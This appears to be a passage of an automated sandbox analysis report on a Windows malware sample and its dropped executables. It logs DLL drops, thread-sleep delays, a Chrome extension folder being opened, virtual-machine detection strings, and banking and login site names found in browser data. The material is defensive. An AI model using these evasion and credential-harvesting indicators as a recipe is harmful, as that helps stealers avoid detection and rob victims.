Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe API coverage: 0.7 %
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe API coverage: 0.0 %
Source: C:\Users\user\Desktop\file.exe TID: 3168 Thread sleep count: 269 > 30
Source: C:\Users\user\Desktop\file.exe TID: 3812 Thread sleep count: 37 > 30
Source: C:\Users\user\Desktop\file.exe TID: 3812 Thread sleep time: -37000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2992 Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2992 Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5540 Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5540 Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 5820 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4092 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3856 Thread sleep count: 362 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3856 Thread sleep time: -10860000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6432 Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6432 Thread sleep time: -72036s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6692 Thread sleep time: -1080000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3856 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe TID: 6728 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Thread sleep count: Count: 1457 delay: -10
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C56C930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: 06f6d9547f.exe, 0000000F.00000003.3011183886.0000000001517000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 0244247334.exe, 0000000E.00000002.3055852446.000000000191B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
Source: GHCGDAFC.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: GHCGDAFC.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: GHCGDAFC.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: GHCGDAFC.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000D.00000002.3240756659.0000000000839000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: GHCGDAFC.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: GHCGDAFC.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: GHCGDAFC.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: GHCGDAFC.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: GHCGDAFC.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: GHCGDAFC.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: GHCGDAFC.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.0000000000A8C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: GHCGDAFC.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: GHCGDAFC.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, file.exe, 00000000.00000002.2449562218.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.0000000000A8C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.0000000000A8C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: CFBAKEHIEB.exe, 00000007.00000002.2503519634.0000000000569000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 0000000B.00000002.2531628183.0000000000839000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000C.00000002.2536191640.0000000000839000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000D.00000002.3240756659.0000000000839000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: GHCGDAFC.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: VMware
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: GHCGDAFC.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: GHCGDAFC.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450878675.0000000001B3D000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000D.00000002.3241803333.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, 0244247334.exe, 0000000E.00000002.3055852446.0000000001949000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: GHCGDAFC.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
